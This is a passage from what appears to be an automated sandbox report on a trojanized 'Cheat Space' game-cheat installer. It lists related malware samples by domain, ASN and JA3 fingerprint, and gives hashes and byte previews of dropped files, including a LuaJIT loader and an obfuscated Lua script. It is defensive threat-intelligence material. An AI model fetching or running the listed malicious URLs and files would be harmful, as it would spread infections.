	bSee.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	OFMwY5n0GO.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Cheat.Space.1.4.3.msi	Get hash	malicious	Unknown	Browse	ip-api.com/json/?fields=query,status,countryCode,city,timezone
	RFQ_20231201-876658xls.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	SecuriteInfo.com.Win32.PWSX-gen.1072.24827.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	DEDVXqwgBB.exe	Get hash	malicious	DCRat, zgRAT	Browse	ip-api.com/line/?fields=hosting
	RFQ_20231201-876678xls.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Nuevo_orden09.xlam.xlsx	Get hash	malicious	AgentTesla, zgRAT	Browse	ip-api.com/line/?fields=hosting
	5Oi86vrTW1.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	ip-api.com/line/?fields=hosting
	17014099242c337b83a3e70cb50d6973455a2f02a99ed0dac287101f7c9603263b3dc5e30c107.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	17014098066c7b82cc06d0a48a81f4c0569763f205b3b256ca333f4137acde0d7007b6a208564.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	UmPMcSzL1S.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	lZn8GLLNIA.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	ip-api.com/line/?fields=hosting
	V1cFwklDSX.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	ip-api.com/line/?fields=hosting
	Cheat_Space_1.4.3.msi	Get hash	malicious	Unknown	Browse	ip-api.com/json/?fields=query,status,countryCode,city,timezone
	5BgnOO8hAu.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	trafik_yenilme.bat	Get hash	malicious	Remcos, zgRAT	Browse	ip-api.com/json/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cdn.discordapp.com	35#Udfdd.bat	Get hash	malicious	Unknown	Browse	162.159.135.233
	CheatLab.exe	Get hash	malicious	RedLine	Browse	162.159.130.233
	CheatLab.exe	Get hash	malicious	RedLine	Browse	162.159.134.233
	rlRiFBcuVa.exe	Get hash	malicious	RedLine, SmokeLoader, Xmrig	Browse	162.159.134.233
	envio-tarde.vbs	Get hash	malicious	XWorm	Browse	162.159.130.233
	https://cdn.discordapp.com/attachments/1178616045720834131/1178616457471479828/Osram_OBV2200169pdf.gz?ex=6576cb1d&is=6564561d&hm=6c33c465c7a065951c3a6e6e0fdd97599ca70b8dad5ebb6b2b7bf6617a63e0ad&	Get hash	malicious	Unknown	Browse	162.159.129.233
	https://cdn.discordapp.com/attachments/1178616045720834131/1178616457471479828/Osram_OBV2200169pdf.gz?ex=6576cb1d&is=6564561d&hm=6c33c465c7a065951c3a6e6e0fdd97599ca70b8dad5ebb6b2b7bf6617a63e0ad&	Get hash	malicious	Unknown	Browse	162.159.133.233
	main.js	Get hash	malicious	Unknown	Browse	162.159.133.233
	main.js	Get hash	malicious	Unknown	Browse	162.159.135.233
	file.exe	Get hash	malicious	DarkTortilla, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	162.159.129.233
	INBV3avdn6.exe	Get hash	malicious	Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	162.159.135.233
	PZoOv1wsSF.exe	Get hash	malicious	DarkTortilla, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	162.159.129.233
	1Ze5CGqX6U.exe	Get hash	malicious	DarkTortilla, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	162.159.135.233
	file.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse	162.159.129.233
	file.exe	Get hash	malicious	DarkTortilla, Djvu, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	162.159.134.233
	Urgent_RFQ.exe	Get hash	malicious	Unknown	Browse	162.159.129.233
	Urgent_RFQ.exe	Get hash	malicious	Unknown	Browse	162.159.129.233
	Vbcob.exe	Get hash	malicious	Unknown	Browse	162.159.133.233
	Rsunmug.exe	Get hash	malicious	Unknown	Browse	162.159.133.233
	Nedqm.exe	Get hash	malicious	Snake Keylogger	Browse	162.159.134.233
ip-api.com	Order789409.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	a.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	Client_V4_BETA.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	bSee.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	OFMwY5n0GO.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Cheat.Space.1.4.3.msi	Get hash	malicious	Unknown	Browse	208.95.112.1
	RFQ_20231201-876658xls.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	SecuriteInfo.com.Win32.PWSX-gen.1072.24827.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	DEDVXqwgBB.exe	Get hash	malicious	DCRat, zgRAT	Browse	208.95.112.1
	RFQ_20231201-876678xls.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Nuevo_orden09.xlam.xlsx	Get hash	malicious	AgentTesla, zgRAT	Browse	208.95.112.1
	5Oi86vrTW1.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	208.95.112.1
	17014099242c337b83a3e70cb50d6973455a2f02a99ed0dac287101f7c9603263b3dc5e30c107.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	17014098066c7b82cc06d0a48a81f4c0569763f205b3b256ca333f4137acde0d7007b6a208564.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	UmPMcSzL1S.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	lZn8GLLNIA.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	208.95.112.1
	V1cFwklDSX.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	208.95.112.1
	Cheat_Space_1.4.3.msi	Get hash	malicious	Unknown	Browse	208.95.112.1
	5BgnOO8hAu.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	trafik_yenilme.bat	Get hash	malicious	Remcos, zgRAT	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TUT-ASUS	Order789409.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	a.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	Client_V4_BETA.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	bSee.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	OFMwY5n0GO.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Cheat.Space.1.4.3.msi	Get hash	malicious	Unknown	Browse	208.95.112.1
	RFQ_20231201-876658xls.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	SecuriteInfo.com.Win32.PWSX-gen.1072.24827.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	DEDVXqwgBB.exe	Get hash	malicious	DCRat, zgRAT	Browse	208.95.112.1
	RFQ_20231201-876678xls.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Nuevo_orden09.xlam.xlsx	Get hash	malicious	AgentTesla, zgRAT	Browse	208.95.112.1
	5Oi86vrTW1.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	208.95.112.1
	17014099242c337b83a3e70cb50d6973455a2f02a99ed0dac287101f7c9603263b3dc5e30c107.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	17014098066c7b82cc06d0a48a81f4c0569763f205b3b256ca333f4137acde0d7007b6a208564.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	UmPMcSzL1S.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	lZn8GLLNIA.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	208.95.112.1
	V1cFwklDSX.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	208.95.112.1
	Cheat_Space_1.4.3.msi	Get hash	malicious	Unknown	Browse	208.95.112.1
	5BgnOO8hAu.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	trafik_yenilme.bat	Get hash	malicious	Remcos, zgRAT	Browse	208.95.112.1
CLOUDFLARENETUS	MAT#7940-748_MATERIAL_CHECK_STOCK_SUPERL_1.doc	Get hash	malicious	HTMLPhisher	Browse	104.21.4.159
	INVOICE_PO.exe	Get hash	malicious	FormBook	Browse	104.21.17.78
	New_Order.exe	Get hash	malicious	FormBook	Browse	172.67.184.73
	DLfNC1EGyi.exe	Get hash	malicious	Unknown	Browse	172.67.141.114
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc, Vidar	Browse	172.67.137.48
	app.apk	Get hash	malicious	Irata	Browse	104.21.83.133
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc, Vidar	Browse	172.67.137.48
	rZjqwGvi9i.exe	Get hash	malicious	Unknown	Browse	172.67.34.170
	Infected.xml	Get hash	malicious	Unknown	Browse	172.64.41.3
	35#Udfdd.bat	Get hash	malicious	Unknown	Browse	162.159.135.233
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc, Vidar	Browse	104.21.7.188
	WLShA46gfV.exe	Get hash	malicious	DCRat, zgRAT	Browse	172.67.129.42
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc, Vidar	Browse	172.67.137.48
	Danskebank update form.html	Get hash	malicious	Unknown	Browse	104.17.24.14
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc, Vidar	Browse	104.21.7.188
	file.exe	Get hash	malicious	Amadey, HTMLPhisher, Glupteba, Petite Virus, Socks5Systemz, onlyLogger	Browse	104.20.67.143
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc	Browse	104.21.7.188
	http://gabby-ash-channel.glitch.me/dark.shtml	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	https://officeautorowa-web126.apasheni.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	104.21.96.69
	https://xllt-103158.square.site/	Get hash	malicious	Unknown	Browse	162.159.136.66

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	CmR9157001.exe	Get hash	malicious	GuLoader	Browse	162.159.130.233
	CmR9157001.exe	Get hash	malicious	GuLoader	Browse	162.159.130.233
	Winlock.exe	Get hash	malicious	Unknown	Browse	162.159.130.233
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	162.159.130.233
	svcservice.exe	Get hash	malicious	NetSupport RAT	Browse	162.159.130.233
	yW9taCl44h.exe	Get hash	malicious	RedLine, SectopRAT	Browse	162.159.130.233
	s6n00Z3C86.exe	Get hash	malicious	Babuk, Clipboard Hijacker, DCRat, Djvu, RedLine, SmokeLoader, zgRAT	Browse	162.159.130.233
	JYAtBufpV4.exe	Get hash	malicious	DCRat, Djvu, RedLine, SmokeLoader, zgRAT	Browse	162.159.130.233
	jDmQ0fSgg6.exe	Get hash	malicious	Vidar	Browse	162.159.130.233
	#U8d85#U7ea7#U6587#U672cTXT.exe	Get hash	malicious	AsyncRAT, DcRat, VenomRAT	Browse	162.159.130.233
	CSSHJQpPTD.exe	Get hash	malicious	Babuk, Djvu, RedLine, SmokeLoader, Vidar	Browse	162.159.130.233
	JgFgdY52fi.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse	162.159.130.233
	A7yXv6oIkf.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse	162.159.130.233
	8PCIN6uOoT.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse	162.159.130.233
	6WdbGOiF8C.exe	Get hash	malicious	Vidar	Browse	162.159.130.233
	sC46xlBFod.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse	162.159.130.233
	SecuriteInfo.com.FileRepMalware.4269.6620.exe	Get hash	malicious	Unknown	Browse	162.159.130.233
	SecuriteInfo.com.Win32.Evo-gen.20184.6826.exe	Get hash	malicious	Unknown	Browse	162.159.130.233
	SecuriteInfo.com.FileRepMetagen.19007.7964.exe	Get hash	malicious	Unknown	Browse	162.159.130.233
	SecuriteInfo.com.Win32.Evo-gen.20184.6826.exe	Get hash	malicious	Unknown	Browse	162.159.130.233

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\MSI3C62.tmp	Cheat.Space.1.4.3.msi	Get hash	malicious	Unknown	Browse
	Cheat_Space_1.4.3.msi	Get hash	malicious	Unknown	Browse
	Cheat_Space_1.4.3_(1).msi	Get hash	malicious	Unknown	Browse
	Cheat_Space_1.4.3.msi	Get hash	malicious	Unknown	Browse
	Cheat_Lab_2.7.2.msi	Get hash	malicious	Unknown	Browse
	Cheat_Lab_2.7.2.msi	Get hash	malicious	LummaC Stealer	Browse
	Cheat.Lab.2.7.2.msi	Get hash	malicious	RedLine	Browse
	Cheat.Lab.2.7.1.msi	Get hash	malicious	RedLine	Browse
	Cheat.Lab.2.7.1.msi	Get hash	malicious	RedLine	Browse
	Cheat.Lab.2.7.1.msi	Get hash	malicious	RedLine	Browse
	Cheat.Lab.2.7.1.msi	Get hash	malicious	RedLine	Browse
	Cheat.Lab.2.7.1.msi	Get hash	malicious	RedLine	Browse
	Cheat.Lab.2.7.0.msi	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	http://telegramos.org/download	Get hash	malicious	Unknown	Browse
	AnyDesk.exe	Get hash	malicious	Unknown	Browse
	AnyDesk.exe	Get hash	malicious	Unknown	Browse
	winrar-611br.msi	Get hash	malicious	Unknown	Browse
	Firefox-x64.msi	Get hash	malicious	Unknown	Browse
	AnyDeskAPP.msi	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Config.Msi\5d1857.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	193260
Entropy (8bit):	6.413534103615694
Encrypted:	false
SSDEEP:	3072:ZM6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOio:ZBKwXYBWHRuEFW9RzLLhrUmdHDZ19Mhp
MD5:	70EECED44F1BFBC3DCC80B2BC2A2653D
SHA1:	F260DD983686009BDAD1EAA5CD7E16CCCD0FB2C7
SHA-256:	6C70B9D4033247FBAFD4E640EE0E3FB3EAB146C7459FE1CBBF37D02A38C570F2
SHA-512:	C199F9F1FA1A80DFB61B6B250D7D0E1C31D10B9C700068B62AF1CC151D8804F4D905258DC4AB29F0F522E043CAABB1F9EA82310157FDE1582BE48A6C6D1E6C0E
Malicious:	false
Preview:	...@IXOS.@.....@..W.@.....@.....@.....@.....@.....@......&.{1B68EDF1-D2C9-4B35-8A12-CF71B48BAA92}..Cheat Space..BpOyVCAP8g.msi.@.....@.....@.....@........&.{02E7296D-0944-4B11-A980-B679F95292AD}.....@.....@.....@.....@.......@.....@.....@.......@......Cheat Space......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....AI_RollbackTasks21.Rolling back scheduled task on the local computer..Task Name: [1]L...AI_RollbackTasks2.@.-........MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..QA..QA..Q...PK..Q...P..Q...PP..Q...PR..Q...PW..Q...Pu..Q...P@..Q...PP..QA..Q...Q...PY..Q...P@..Q...Q@..QA..Q@..Q...P@..QRichA..Q................PE..L....;.a.........."!................'........ ......................................O.....@.................................X...x.......x...........................ty..p....................z.......$..@............ .........@.................

C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	893984
Entropy (8bit):	6.500692182178148
Encrypted:	false
SSDEEP:	12288:fZv9gKa9r+ElZQ6AuKPzHVHIeDK0x+Mo+TKTtxBoowkd:53A+E9AuKPKeW0xDo+TKTtYjI
MD5:	9C3C6C6A9AE84C33D6A09F4FB5E319CB
SHA1:	E4A3536BBB04C4336A18888853C18F9E7C557750
SHA-256:	CCF5E91729C7247ED31075C9ACC39E55A178EF71F47B8D5171FE2E6003945231
SHA-512:	4631C97BB30AFAAE17CFB42347FC6E10D88BF17D7794497DAB8452763A19E21AEEC59D087D9B163897AB856DBB831AD51F076BECEE17AB0E54B1D323B7DB4026
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 3%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1J..u+..u+..u+..a@..h+..a@..`+..a@..+..a@..v+..u+...+...Q..R+...Q..g+...Q...+..u+..t+...Q..6+...Q..t+...Q..t+..Richu+..........................PE..d...E.ie..........".... .......................@.................................... .....`............................................. .......(............P..x...............\|....~...............................}..@...............P............................text............................... ..`.rdata..............................@..@.data...x"... ......................@....pdata..x....P......................@..@_RDATA..\...........................@..@.reloc..\|...........................@..B................................................................................................................................................................................................................................

C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	134151
Entropy (8bit):	6.049160585116401
Encrypted:	false
SSDEEP:	1536:goowP2k4dvhKX18oVHUBKZ372A5WwltKqGC1zoTkMWPK6Yjopv7BX8k2nxldm:7JPf4dvigB2rNWwDKdC1zc6YEpj6T4
MD5:	C4CDB3CB828417A39D29B76A09D36606
SHA1:	64D5BD646878FC77ED6FE57894EBBE33FCABFCF7
SHA-256:	2EFAE60F0BA483E34A2C5E037F39BA7CF197A22432686C5242B46EC98BD81B48
SHA-512:	41157A0BD3532919AF7DACE3ED8B851F47528BDA2631DC6E701FC9DE78C075352695EE90FF836F0F7D5D1520481355C9B46B554E1B44462139DF56D832F634D1
Malicious:	true
Preview:	.LJ..........-.......8...L.......C.......-...-...4...>...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........i.......)...:.......X...U...-...-...8...........<...-...8.......X...-...-...,...<...<...8...X...K..............R........,.F.....XG..UG..G....G.XG..G....G.XGg.G....G.XGq.G....G.XG..G....G.XG..G....G.XG).G....G.XG..)GyQ..G.XG..)G."..G.XG....!.../.XG.....XG.....XG..+F.....XG..G....G.XGt.+7..+-..-G...I..BG....G.-G...I..BG....G.-G...I..BG....G.-G...I..BG....G.-G...I%.BG...%G.+...-G...I<.BG...<G.-G...ID.BG...DG.+:..+(..)...47..'%..-G..BG...<G.-G..BG....G....+...+...+D..-G..<D<G'...-G..BG...DG.4-..-G..<.DG-G..8..G-G...I2.BG...2G.'...-G..)I..BG...:G.'2..8...-G..BG....G.-G..<..G-G..8.2G'2..8.2.-G..82:G':..8.:2-G..8:%G-G..)Ib.BG...%G.82%:-G..BG...%G.):..-G..<:%G-G..BG...(G.):..-G..<:.G-G..<7(G4:..)...)7...0..)....6..)....6..XG..+)..XG..+)..!.6.XGa.*:..:...'2..-G..:H..8<HG-G..:H..8.HG.G...I2..J:.BG....G.-G..)I5.BG...DG.8DD.8..<.GD..I...J..BG...DG..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE47B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sun Dec 3 16:24:05 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	276154
Entropy (8bit):	3.4915110744189946
Encrypted:	false
SSDEEP:	1536:RUBBGoF/y23MjDZA8QAj+RtLSVXftTznmiEllYAedHuBojRypN4uE2aOjzJFuCDy:gB53mzAtLylsSzpU4uEqjtzaLTgquq
MD5:	2D1D85A14F14146F15DD2157BA73E31C
SHA1:	CB5E9B6415E23E168796533D5D2E6F6C2B585B7C
SHA-256:	EE60F0132406B85C46138ECF8089B8B64908D342CFD2D58B1034F1B69956D154
SHA-512:	8DA719023DE4430ECF54A22CCB9296F716A167A496C8ABCA484AB6F31AC67266F29357779DC226D2E724E650F30F31906601B71C18F56F1D1BDCCEED537C58A4
Malicious:	false
Preview:	MDMP..a..... .........le............D...............X.......<...\$......."...S..........`.......8...........T............5...............$...........&..............................................................................eJ.......'......GenuineIntel............T.......p.....le............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE69E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6378
Entropy (8bit):	3.7143295523730098
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbdk6OYZlDUQE/GOTgaM4Ujx89bIyXsfbe6Am:R6l7wVeJdk6OYZlDUQprjx89bdXsfqfm
MD5:	AAF776C19B453818B39FC93C8B27924A
SHA1:	BFF2DD6C7A95A1A9666F31E4D6CF797E873AB9EF
SHA-256:	250B45BBD70C8A26BDA5B689C93B8148E1821BCDD5896B8BEB64247CB01923B0
SHA-512:	D5ACB74025ABC93C2B2C0F8D2E6E4AEE71D2C74E6D277B317CB939B36A8B98E793F557685867A0109246F9AEC697EF3DC7AACA5BD75681CAF65E2D893B3320AD
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.1.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE6CE.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4752
Entropy (8bit):	4.447240382677649
Encrypted:	false
SSDEEP:	48:cvIwWl8zsqJg77aI9OBWpW8VYOYm8M4JQIF4QsFB+q8vWF4Qrn13iTziqd:uIjf4I7YQ7V+JQggKijlsziqd
MD5:	287599B4B37D29E267D0952469387741
SHA1:	C5813C86268CE9A38A5D2AF4797C809055DDF448
SHA-256:	AB23775F5E17944E3142399F847DDD310789813F5ABBC6F8CE7CD6361F85F232
SHA-512:	C10EC64DB9E23213B156901CE5B6FA01A954E5FF81DA1CEA5AA95F9002B132443BF209A522AFFF40EA5DB558FF2E7F8A772B6907019B8F3601520A209699F804
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="88286" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096

C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe

Download File

Process:	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	893984
Entropy (8bit):	6.500692182178148
Encrypted:	false
SSDEEP:	12288:fZv9gKa9r+ElZQ6AuKPzHVHIeDK0x+Mo+TKTtxBoowkd:53A+E9AuKPKeW0xDo+TKTtYjI
MD5:	9C3C6C6A9AE84C33D6A09F4FB5E319CB
SHA1:	E4A3536BBB04C4336A18888853C18F9E7C557750
SHA-256:	CCF5E91729C7247ED31075C9ACC39E55A178EF71F47B8D5171FE2E6003945231
SHA-512:	4631C97BB30AFAAE17CFB42347FC6E10D88BF17D7794497DAB8452763A19E21AEEC59D087D9B163897AB856DBB831AD51F076BECEE17AB0E54B1D323B7DB4026
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 3%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1J..u+..u+..u+..a@..h+..a@..`+..a@..+..a@..v+..u+...+...Q..R+...Q..g+...Q...+..u+..t+...Q..6+...Q..t+...Q..t+..Richu+..........................PE..d...E.ie..........".... .......................@.................................... .....`............................................. .......(............P..x...............\|....~...............................}..@...............P............................text............................... ..`.rdata..............................@..@.data...x"... ......................@....pdata..x....P......................@..@_RDATA..\...........................@..@.reloc..\|...........................@..B................................................................................................................................................................................................................................

C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua

Download File

Process:	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe
File Type:	data
Category:	dropped
Size (bytes):	134151
Entropy (8bit):	6.049160585116401
Encrypted:	false
SSDEEP:	1536:goowP2k4dvhKX18oVHUBKZ372A5WwltKqGC1zoTkMWPK6Yjopv7BX8k2nxldm:7JPf4dvigB2rNWwDKdC1zc6YEpj6T4
MD5:	C4CDB3CB828417A39D29B76A09D36606
SHA1:	64D5BD646878FC77ED6FE57894EBBE33FCABFCF7
SHA-256:	2EFAE60F0BA483E34A2C5E037F39BA7CF197A22432686C5242B46EC98BD81B48
SHA-512:	41157A0BD3532919AF7DACE3ED8B851F47528BDA2631DC6E701FC9DE78C075352695EE90FF836F0F7D5D1520481355C9B46B554E1B44462139DF56D832F634D1
Malicious:	true
Preview:	.LJ..........-.......8...L.......C.......-...-...4...>...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........i.......)...:.......X...U...-...-...8...........<...-...8.......X...-...-...,...<...<...8...X...K..............R........,.F.....XG..UG..G....G.XG..G....G.XGg.G....G.XGq.G....G.XG..G....G.XG..G....G.XG).G....G.XG..)GyQ..G.XG..)G."..G.XG....!.../.XG.....XG.....XG..+F.....XG..G....G.XGt.+7..+-..-G...I..BG....G.-G...I..BG....G.-G...I..BG....G.-G...I..BG....G.-G...I%.BG...%G.+...-G...I<.BG...<G.-G...ID.BG...DG.+:..+(..)...47..'%..-G..BG...<G.-G..BG....G....+...+...+D..-G..<D<G'...-G..BG...DG.4-..-G..<.DG-G..8..G-G...I2.BG...2G.'...-G..)I..BG...:G.'2..8...-G..BG....G.-G..<..G-G..8.2G'2..8.2.-G..82:G':..8.:2-G..8:%G-G..)Ib.BG...%G.82%:-G..BG...%G.):..-G..<:%G-G..BG...(G.):..-G..<:.G-G..<7(G4:..)...)7...0..)....6..)....6..XG..+)..XG..+)..!.6.XGa.*:..:...'2..-G..:H..8<HG-G..:H..8.HG.G...I2..J:.BG....G.-G..)I5.BG...DG.8DD.8..<.GD..I...J..BG...DG..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pip.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Python\pip.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
MD5:	7B709BC412BEC5C3CFD861C041DAD408
SHA1:	532EA6BB3018AE3B51E7A5788F614A6C49252BCF
